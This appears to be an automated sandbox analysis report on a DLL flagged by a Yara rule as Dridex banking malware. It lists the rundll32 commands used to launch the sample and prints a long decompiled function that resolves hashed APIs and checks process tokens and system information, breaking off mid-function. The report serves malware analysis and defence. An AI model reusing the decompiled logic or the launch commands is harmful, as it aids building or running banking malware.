                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States

                                                                                                                                    Network Behavior

                                                                                                                                    No network behavior found

                                                                                                                                    Code Manipulations

                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Start time:23:40:31
                                                                                                                                    Start date:19/04/2021
                                                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:loaddll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll'
                                                                                                                                    Imagebase:0x9b0000
                                                                                                                                    File size:116736 bytes
                                                                                                                                    MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:23:40:31
                                                                                                                                    Start date:19/04/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1
                                                                                                                                    Imagebase:0x150000
                                                                                                                                    File size:232960 bytes
                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:23:40:32
                                                                                                                                    Start date:19/04/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1
                                                                                                                                    Imagebase:0x1150000
                                                                                                                                    File size:61952 bytes
                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:23:41:10
                                                                                                                                    Start date:19/04/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',ReadLogRecord
                                                                                                                                    Imagebase:0x1150000
                                                                                                                                    File size:61952 bytes
                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000002.494855843.0000000073221000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:23:41:11
                                                                                                                                    Start date:19/04/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 424
                                                                                                                                    Imagebase:0x1350000
                                                                                                                                    File size:434592 bytes
                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                    Reset < >

                                                                                                                                      Executed Functions

                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                      			E732307CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                                      				void* _t152;
                                                                                                                                      				void* _t155;
                                                                                                                                      				signed char* _t156;
                                                                                                                                      				char _t159;
                                                                                                                                      				intOrPtr* _t163;
                                                                                                                                      				void* _t177;
                                                                                                                                      				intOrPtr _t186;
                                                                                                                                      				char _t187;
                                                                                                                                      				void* _t192;
                                                                                                                                      				void* _t196;
                                                                                                                                      				void* _t198;
                                                                                                                                      				void* _t199;
                                                                                                                                      				void* _t202;
                                                                                                                                      				void* _t208;
                                                                                                                                      				void* _t209;
                                                                                                                                      				void* _t211;
                                                                                                                                      				void* _t212;
                                                                                                                                      				void* _t219;
                                                                                                                                      				void* _t232;
                                                                                                                                      				void* _t234;
                                                                                                                                      				void* _t237;
                                                                                                                                      				void* _t240;
                                                                                                                                      				void* _t243;
                                                                                                                                      				void* _t246;
                                                                                                                                      				void* _t250;
                                                                                                                                      				void* _t254;
                                                                                                                                      				void* _t255;
                                                                                                                                      				void* _t257;
                                                                                                                                      				long _t258;
                                                                                                                                      				void* _t261;
                                                                                                                                      				void* _t264;
                                                                                                                                      				int _t267;
                                                                                                                                      				void* _t268;
                                                                                                                                      				void* _t272;
                                                                                                                                      				void* _t273;
                                                                                                                                      				void* _t274;
                                                                                                                                      				void* _t278;
                                                                                                                                      				int _t280;
                                                                                                                                      				intOrPtr* _t284;
                                                                                                                                      				signed char _t288;
                                                                                                                                      				signed char _t289;
                                                                                                                                      				signed int _t293;
                                                                                                                                      				void* _t314;
                                                                                                                                      				void* _t319;
                                                                                                                                      				void* _t355;
                                                                                                                                      				void* _t364;
                                                                                                                                      				void* _t369;
                                                                                                                                      				void* _t374;
                                                                                                                                      				void* _t375;
                                                                                                                                      				void* _t376;
                                                                                                                                      				void* _t377;
                                                                                                                                      				void* _t378;
                                                                                                                                      				void* _t379;
                                                                                                                                      				void* _t385;
                                                                                                                                      				void* _t392;
                                                                                                                                      				signed int _t397;
                                                                                                                                      				intOrPtr* _t400;
                                                                                                                                      				void* _t403;
                                                                                                                                      				signed int _t405;
                                                                                                                                      				void* _t407;
                                                                                                                                      				void* _t408;
                                                                                                                                      				void* _t413;
                                                                                                                                      				intOrPtr* _t417;
                                                                                                                                      				void* _t419;
                                                                                                                                      				void** _t421;
                                                                                                                                      				void* _t422;
                                                                                                                                      				void* _t423;
                                                                                                                                      				void* _t424;
                                                                                                                                      
                                                                                                                                      				_push(__esi);
                                                                                                                                      				_push(__edi);
                                                                                                                                      				_push(__ebx);
                                                                                                                                      				_t423 = _t422 - 0x1e0;
                                                                                                                                      				_t407 = __ecx;
                                                                                                                                      				_t152 =  *0x7323d1f8;
                                                                                                                                      				if(_t152 == 0x16a9e13a) {
                                                                                                                                      					_t152 = E73233558(0x30);
                                                                                                                                      					 *0x7323d1f8 = _t152;
                                                                                                                                      				}
                                                                                                                                      				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
                                                                                                                                      					_t408 = _t423 + 0x48;
                                                                                                                                      					E732335D4(_t408, 0, 0x11c);
                                                                                                                                      					_t424 = _t423 + 0xc;
                                                                                                                                      					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
                                                                                                                                      					_t155 = E73232F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
                                                                                                                                      					if(_t155 == 0) {
                                                                                                                                      						_t395 =  *0x7323d1f8;
                                                                                                                                      						_t156 = _t424 + 0x4c;
                                                                                                                                      						_t288 =  *_t156;
                                                                                                                                      						 *(_t395 + 8) = _t288;
                                                                                                                                      						_t289 = _t156[4];
                                                                                                                                      						 *(_t395 + 9) = _t289;
                                                                                                                                      						__eflags = _t156[0x116] - 1;
                                                                                                                                      						_t389 =  *(_t424 + 0x54);
                                                                                                                                      						 *((char*)(_t395 + 0xa)) = _t156[0x110];
                                                                                                                                      						 *(_t395 + 4) =  *(_t424 + 0x54);
                                                                                                                                      						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
                                                                                                                                      						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
                                                                                                                                      						_t159 = E73231094(_t395);
                                                                                                                                      						 *(_t424 + 0x198) = 0;
                                                                                                                                      						 *((char*)( *0x7323d1f8 + 0xb)) = _t159;
                                                                                                                                      						_t355 = E73232F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
                                                                                                                                      						__eflags = _t355;
                                                                                                                                      						if(_t355 == 0) {
                                                                                                                                      							L12:
                                                                                                                                      							__eflags = 0;
                                                                                                                                      							 *((char*)( *0x7323d1f8 + 0x28)) = 0;
                                                                                                                                      							_t163 = E732307CC(0x7323d1f8, 0, _t389, _t395);
                                                                                                                                      							__eflags =  *_t163 - 0x10;
                                                                                                                                      							if( *_t163 >= 0x10) {
                                                                                                                                      								_t293 = 6;
                                                                                                                                      								memcpy(_t424 + 0x164, 0x7323bc80, _t293 << 2);
                                                                                                                                      								_t424 = _t424 + 0xc;
                                                                                                                                      								_t392 = 0x7323bc80 + _t293 + _t293;
                                                                                                                                      								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
                                                                                                                                      								E7322F620(_t424 + 0x24, 0);
                                                                                                                                      								_t397 = 0;
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								do {
                                                                                                                                      									E7322F8C4(_t424 + 0x24, E7322F568(_t424 + 0x20) + 4);
                                                                                                                                      									 *((intOrPtr*)(E7322F558(_t424 + 0x24, E7322F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
                                                                                                                                      									_t397 = _t397 + 1;
                                                                                                                                      									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
                                                                                                                                      									__eflags = _t397 - 6;
                                                                                                                                      								} while (_t397 < 6);
                                                                                                                                      								_push(0);
                                                                                                                                      								E732354EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
                                                                                                                                      								E7322F6F0(_t424 + 0x20);
                                                                                                                                      								E7323551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
                                                                                                                                      								_t177 = E732357D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
                                                                                                                                      								_t398 = _t177;
                                                                                                                                      								E7322E054(_t424 + 0x1c0);
                                                                                                                                      								__eflags = _t177;
                                                                                                                                      								if(_t177 != 0) {
                                                                                                                                      									E7323551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
                                                                                                                                      									_t413 = E732357D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
                                                                                                                                      									E7322E054(_t424 + 0x1c8);
                                                                                                                                      									_t398 = _t424 + 0x1d0;
                                                                                                                                      									E7323551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
                                                                                                                                      									_t392 = E732357D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
                                                                                                                                      									E7322E054(_t424 + 0x1d0);
                                                                                                                                      									__eflags = _t413;
                                                                                                                                      									if(_t413 != 0) {
                                                                                                                                      										__eflags = _t413 - 5;
                                                                                                                                      										if(_t413 != 5) {
                                                                                                                                      											__eflags = _t413 - 2;
                                                                                                                                      											if(_t413 != 2) {
                                                                                                                                      												goto L58;
                                                                                                                                      											} else {
                                                                                                                                      												__eflags = _t392 - 1;
                                                                                                                                      												if(_t392 != 1) {
                                                                                                                                      													goto L58;
                                                                                                                                      												} else {
                                                                                                                                      													E7322D098(_t424 + 0xc);
                                                                                                                                      													__eflags =  *((char*)(_t424 + 8));
                                                                                                                                      													if( *((char*)(_t424 + 8)) != 0) {
                                                                                                                                      														_t375 =  *(_t424 + 4);
                                                                                                                                      														__eflags = _t375;
                                                                                                                                      														if(_t375 == 0) {
                                                                                                                                      															L53:
                                                                                                                                      															_t237 = 1;
                                                                                                                                      														} else {
                                                                                                                                      															__eflags = _t375 - 0xffffffff;
                                                                                                                                      															if(_t375 != 0xffffffff) {
                                                                                                                                      																_t237 = 0;
                                                                                                                                      																__eflags = 0;
                                                                                                                                      															} else {
                                                                                                                                      																goto L53;
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      														__eflags = _t237;
                                                                                                                                      														if(_t237 == 0) {
                                                                                                                                      															E732354C4(_t375);
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      													 *(_t424 + 4) = 0;
                                                                                                                                      													_t186 = 5;
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											__eflags = _t392;
                                                                                                                                      											if(_t392 != 0) {
                                                                                                                                      												__eflags = _t392 - 1;
                                                                                                                                      												if(_t392 == 1) {
                                                                                                                                      													E7322D098(_t424 + 0xc);
                                                                                                                                      													__eflags =  *((char*)(_t424 + 8));
                                                                                                                                      													if( *((char*)(_t424 + 8)) != 0) {
                                                                                                                                      														_t376 =  *(_t424 + 4);
                                                                                                                                      														__eflags = _t376;
                                                                                                                                      														if(_t376 == 0) {
                                                                                                                                      															L108:
                                                                                                                                      															_t240 = 1;
                                                                                                                                      														} else {
                                                                                                                                      															__eflags = _t376 - 0xffffffff;
                                                                                                                                      															if(_t376 != 0xffffffff) {
                                                                                                                                      																_t240 = 0;
                                                                                                                                      																__eflags = 0;
                                                                                                                                      															} else {
                                                                                                                                      																goto L108;
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      														__eflags = _t240;
                                                                                                                                      														if(_t240 == 0) {
                                                                                                                                      															E732354C4(_t376);
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      													 *(_t424 + 4) = 0;
                                                                                                                                      													_t186 = 4;
                                                                                                                                      												} else {
                                                                                                                                      													goto L58;
                                                                                                                                      												}
                                                                                                                                      											} else {
                                                                                                                                      												E7322D098(_t424 + 0xc);
                                                                                                                                      												__eflags =  *((char*)(_t424 + 8));
                                                                                                                                      												if( *((char*)(_t424 + 8)) != 0) {
                                                                                                                                      													_t377 =  *(_t424 + 4);
                                                                                                                                      													__eflags = _t377;
                                                                                                                                      													if(_t377 == 0) {
                                                                                                                                      														L41:
                                                                                                                                      														_t243 = 1;
                                                                                                                                      													} else {
                                                                                                                                      														__eflags = _t377 - 0xffffffff;
                                                                                                                                      														if(_t377 != 0xffffffff) {
                                                                                                                                      															_t243 = 0;
                                                                                                                                      															__eflags = 0;
                                                                                                                                      														} else {
                                                                                                                                      															goto L41;
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      													__eflags = _t243;
                                                                                                                                      													if(_t243 == 0) {
                                                                                                                                      														E732354C4(_t377);
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      												 *(_t424 + 4) = 0;
                                                                                                                                      												_t186 = 3;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										__eflags = _t392;
                                                                                                                                      										if(_t392 != 0) {
                                                                                                                                      											L58:
                                                                                                                                      											E7322D098(_t424 + 0xc);
                                                                                                                                      											__eflags =  *((char*)(_t424 + 8));
                                                                                                                                      											if( *((char*)(_t424 + 8)) != 0) {
                                                                                                                                      												_t374 =  *(_t424 + 4);
                                                                                                                                      												__eflags = _t374;
                                                                                                                                      												if(_t374 == 0) {
                                                                                                                                      													L61:
                                                                                                                                      													_t234 = 1;
                                                                                                                                      												} else {
                                                                                                                                      													__eflags = _t374 - 0xffffffff;
                                                                                                                                      													if(_t374 != 0xffffffff) {
                                                                                                                                      														_t234 = 0;
                                                                                                                                      														__eflags = 0;
                                                                                                                                      													} else {
                                                                                                                                      														goto L61;
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      												__eflags = _t234;
                                                                                                                                      												if(_t234 == 0) {
                                                                                                                                      													E732354C4(_t374);
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      											_t186 = 0;
                                                                                                                                      											__eflags = 0;
                                                                                                                                      											 *(_t424 + 4) = 0;
                                                                                                                                      										} else {
                                                                                                                                      											E7322D098(_t424 + 0xc);
                                                                                                                                      											__eflags =  *((char*)(_t424 + 8));
                                                                                                                                      											if( *((char*)(_t424 + 8)) != 0) {
                                                                                                                                      												_t378 =  *(_t424 + 4);
                                                                                                                                      												__eflags = _t378;
                                                                                                                                      												if(_t378 == 0) {
                                                                                                                                      													L31:
                                                                                                                                      													_t246 = 1;
                                                                                                                                      												} else {
                                                                                                                                      													__eflags = _t378 - 0xffffffff;
                                                                                                                                      													if(_t378 != 0xffffffff) {
                                                                                                                                      														_t246 = 0;
                                                                                                                                      														__eflags = 0;
                                                                                                                                      													} else {
                                                                                                                                      														goto L31;
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      												__eflags = _t246;
                                                                                                                                      												if(_t246 == 0) {
                                                                                                                                      													E732354C4(_t378);
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      											 *(_t424 + 4) = 0;
                                                                                                                                      											_t186 = 2;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									E7322D098(_t424 + 0xc);
                                                                                                                                      									__eflags =  *((char*)(_t424 + 8));
                                                                                                                                      									if( *((char*)(_t424 + 8)) != 0) {
                                                                                                                                      										_t379 =  *(_t424 + 4);
                                                                                                                                      										__eflags = _t379;
                                                                                                                                      										if(_t379 == 0) {
                                                                                                                                      											L21:
                                                                                                                                      											_t250 = 1;
                                                                                                                                      										} else {
                                                                                                                                      											__eflags = _t379 - 0xffffffff;
                                                                                                                                      											if(_t379 != 0xffffffff) {
                                                                                                                                      												_t250 = 0;
                                                                                                                                      												__eflags = 0;
                                                                                                                                      											} else {
                                                                                                                                      												goto L21;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      										__eflags = _t250;
                                                                                                                                      										if(_t250 == 0) {
                                                                                                                                      											E732354C4(_t379);
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									 *(_t424 + 4) = 0;
                                                                                                                                      									_t186 = 1;
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								_t186 = 1;
                                                                                                                                      							}
                                                                                                                                      							 *((intOrPtr*)( *0x7323d1f8 + 0x24)) = _t186;
                                                                                                                                      							_t187 = E732310CC(0xffffffffffffffff);
                                                                                                                                      							_t314 =  *0x7323d1f8;
                                                                                                                                      							 *((char*)(_t314 + 0x29)) = _t187;
                                                                                                                                      							__eflags =  *_t314 - 0x10;
                                                                                                                                      							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
                                                                                                                                      							if( *_t314 >= 0x10) {
                                                                                                                                      								__eflags = 0xffffffffffffffff;
                                                                                                                                      								 *((intOrPtr*)( *0x7323d1f8 + 0x2c)) = E73231140(0xffffffffffffffff, _t392, _t398);
                                                                                                                                      								goto L78;
                                                                                                                                      							} else {
                                                                                                                                      								 *(_t424 + 0x19c) = 0;
                                                                                                                                      								_t364 = E73232F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
                                                                                                                                      								__eflags = _t364;
                                                                                                                                      								if(_t364 == 0) {
                                                                                                                                      									L74:
                                                                                                                                      									_t196 =  *0x7323d1f8;
                                                                                                                                      									__eflags =  *((char*)(_t196 + 0x28));
                                                                                                                                      									if( *((char*)(_t196 + 0x28)) == 0) {
                                                                                                                                      										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
                                                                                                                                      									} else {
                                                                                                                                      										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
                                                                                                                                      									}
                                                                                                                                      									goto L78;
                                                                                                                                      								} else {
                                                                                                                                      									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
                                                                                                                                      									__eflags = _t198;
                                                                                                                                      									if(_t198 == 0) {
                                                                                                                                      										_t199 = E7323352C(_t398);
                                                                                                                                      										__eflags = _t199;
                                                                                                                                      										if(_t199 != 0) {
                                                                                                                                      											goto L74;
                                                                                                                                      										} else {
                                                                                                                                      											goto L69;
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										L69:
                                                                                                                                      										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
                                                                                                                                      										 *((char*)(_t424 + 0x34)) = 1;
                                                                                                                                      										 *(_t424 + 0x1a4) = 0;
                                                                                                                                      										_t319 = E73232F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
                                                                                                                                      										__eflags = _t319;
                                                                                                                                      										if(_t319 != 0) {
                                                                                                                                      											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
                                                                                                                                      											__eflags = _t232;
                                                                                                                                      											if(_t232 == 0) {
                                                                                                                                      												E7323352C(_t398);
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      										_t202 =  *(_t424 + 0x1a4);
                                                                                                                                      										__eflags = _t202;
                                                                                                                                      										if(_t202 != 0) {
                                                                                                                                      											E7322F620(_t424 + 0x18c, _t202);
                                                                                                                                      											_t403 = E73232F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
                                                                                                                                      											__eflags = _t403;
                                                                                                                                      											if(_t403 == 0) {
                                                                                                                                      												L124:
                                                                                                                                      												E7322F6F0(_t424 + 0x188);
                                                                                                                                      												goto L72;
                                                                                                                                      											} else {
                                                                                                                                      												_t208 = E7322F558(_t424 + 0x18c, 0);
                                                                                                                                      												_t209 = E7322F568(_t424 + 0x188);
                                                                                                                                      												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
                                                                                                                                      												__eflags = _t211;
                                                                                                                                      												if(_t211 == 0) {
                                                                                                                                      													_t212 = E7323352C(_t403);
                                                                                                                                      													__eflags = _t212;
                                                                                                                                      													if(_t212 != 0) {
                                                                                                                                      														goto L124;
                                                                                                                                      													} else {
                                                                                                                                      														goto L116;
                                                                                                                                      													}
                                                                                                                                      												} else {
                                                                                                                                      													L116:
                                                                                                                                      													_t417 = E7322F558(_t424 + 0x18c, 0);
                                                                                                                                      													E7322DFFC(_t424 + 0x1b4, 0);
                                                                                                                                      													 *(_t424 + 0x1ac) = 0;
                                                                                                                                      													_t369 = E73232F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
                                                                                                                                      													__eflags = _t369;
                                                                                                                                      													if(_t369 != 0) {
                                                                                                                                      														 *_t369( *_t417, _t424 + 0x1ac);
                                                                                                                                      													}
                                                                                                                                      													E7322E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
                                                                                                                                      													_t219 = E73232F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
                                                                                                                                      													__eflags = _t219;
                                                                                                                                      													if(_t219 == 0) {
                                                                                                                                      														E7322E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
                                                                                                                                      														_t419 = E73234BE0( *((intOrPtr*)(_t424 + 0x1b8)), E7322E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
                                                                                                                                      														E7322E054(_t424 + 0x1b8);
                                                                                                                                      														E7322E054(_t424 + 0x1b0);
                                                                                                                                      														E7322F6F0(_t424 + 0x188);
                                                                                                                                      														__eflags =  *((char*)(_t424 + 0x34));
                                                                                                                                      														if( *((char*)(_t424 + 0x34)) != 0) {
                                                                                                                                      															E7322BC00(_t424 + 0x30);
                                                                                                                                      														}
                                                                                                                                      														__eflags = _t419 - 0x6df4cf7;
                                                                                                                                      														if(_t419 != 0x6df4cf7) {
                                                                                                                                      															goto L74;
                                                                                                                                      														} else {
                                                                                                                                      															 *((intOrPtr*)( *0x7323d1f8 + 0x2c)) = 6;
                                                                                                                                      															L78:
                                                                                                                                      															_t192 = E73232F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
                                                                                                                                      															__eflags = _t192;
                                                                                                                                      															if(_t192 != 0) {
                                                                                                                                      																GetSystemInfo(_t424 + 0x164); // executed
                                                                                                                                      															}
                                                                                                                                      															_t152 =  *0x7323d1f8;
                                                                                                                                      															_t284 = _t424 + 0x178;
                                                                                                                                      															_t400 = _t424 + 0x170;
                                                                                                                                      															 *((short*)(_t152 + 0xe)) =  *_t284;
                                                                                                                                      															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
                                                                                                                                      															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
                                                                                                                                      															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
                                                                                                                                      															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
                                                                                                                                      															goto L81;
                                                                                                                                      														}
                                                                                                                                      													} else {
                                                                                                                                      														_push( *(_t424 + 0x1ac));
                                                                                                                                      														asm("int3");
                                                                                                                                      														return _t219;
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											L72:
                                                                                                                                      											__eflags =  *((char*)(_t424 + 0x34));
                                                                                                                                      											if( *((char*)(_t424 + 0x34)) != 0) {
                                                                                                                                      												E7322BC00(_t424 + 0x30);
                                                                                                                                      											}
                                                                                                                                      											goto L74;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
                                                                                                                                      							__eflags = _t254;
                                                                                                                                      							if(_t254 == 0) {
                                                                                                                                      								_t255 = E7323352C(_t395);
                                                                                                                                      								__eflags = _t255;
                                                                                                                                      								if(_t255 != 0) {
                                                                                                                                      									goto L12;
                                                                                                                                      								} else {
                                                                                                                                      									goto L7;
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								L7:
                                                                                                                                      								 *(_t424 + 0x14) =  *(_t424 + 0x198);
                                                                                                                                      								 *((char*)(_t424 + 0x18)) = 1;
                                                                                                                                      								 *(_t424 + 0x1a0) = 0;
                                                                                                                                      								_t257 = E73232F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
                                                                                                                                      								__eflags = _t257;
                                                                                                                                      								if(_t257 != 0) {
                                                                                                                                      									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
                                                                                                                                      									__eflags = _t280;
                                                                                                                                      									if(_t280 == 0) {
                                                                                                                                      										E7323352C(_t395);
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								_t258 =  *(_t424 + 0x1a0);
                                                                                                                                      								__eflags = _t258;
                                                                                                                                      								if(_t258 != 0) {
                                                                                                                                      									E7322F620(_t424 + 0x3c, _t258);
                                                                                                                                      									_t261 = E73232F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
                                                                                                                                      									_t395 = _t261;
                                                                                                                                      									__eflags = _t261;
                                                                                                                                      									if(_t261 == 0) {
                                                                                                                                      										L98:
                                                                                                                                      										E7322F6F0(_t424 + 0x38);
                                                                                                                                      										goto L10;
                                                                                                                                      									} else {
                                                                                                                                      										_t264 = E7322F558(_t424 + 0x3c, 0);
                                                                                                                                      										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E7322F568(_t424 + 0x38), _t424 + 0x1a0); // executed
                                                                                                                                      										__eflags = _t267;
                                                                                                                                      										if(_t267 == 0) {
                                                                                                                                      											_t268 = E7323352C(_t395);
                                                                                                                                      											__eflags = _t268;
                                                                                                                                      											if(_t268 != 0) {
                                                                                                                                      												goto L98;
                                                                                                                                      											} else {
                                                                                                                                      												goto L85;
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											L85:
                                                                                                                                      											_t421 = E7322F558(_t424 + 0x3c, 0);
                                                                                                                                      											_t389 = _t424 + 0x1d8;
                                                                                                                                      											 *(_t424 + 0x1d8 - 0x30) = 0;
                                                                                                                                      											asm("movsd");
                                                                                                                                      											asm("movsb");
                                                                                                                                      											asm("movsb");
                                                                                                                                      											_t395 = E73232F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
                                                                                                                                      											__eflags = _t395;
                                                                                                                                      											if(_t395 == 0) {
                                                                                                                                      												goto L98;
                                                                                                                                      											} else {
                                                                                                                                      												_t272 = _t424 + 0x1a8;
                                                                                                                                      												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
                                                                                                                                      												__eflags = _t273;
                                                                                                                                      												if(_t273 == 0) {
                                                                                                                                      													_t274 = E7323352C(_t395);
                                                                                                                                      													__eflags = _t274;
                                                                                                                                      													if(_t274 != 0) {
                                                                                                                                      														goto L98;
                                                                                                                                      													} else {
                                                                                                                                      														goto L87;
                                                                                                                                      													}
                                                                                                                                      												} else {
                                                                                                                                      													L87:
                                                                                                                                      													_t389 =  *(_t424 + 0x1a8);
                                                                                                                                      													__eflags =  *_t421;
                                                                                                                                      													if( *_t421 <= 0) {
                                                                                                                                      														L92:
                                                                                                                                      														__eflags = _t389;
                                                                                                                                      														if(_t389 == 0) {
                                                                                                                                      															L94:
                                                                                                                                      															_t385 = 1;
                                                                                                                                      														} else {
                                                                                                                                      															__eflags = _t389 - 0xffffffff;
                                                                                                                                      															if(_t389 != 0xffffffff) {
                                                                                                                                      																_t385 = 0;
                                                                                                                                      																__eflags = 0;
                                                                                                                                      															} else {
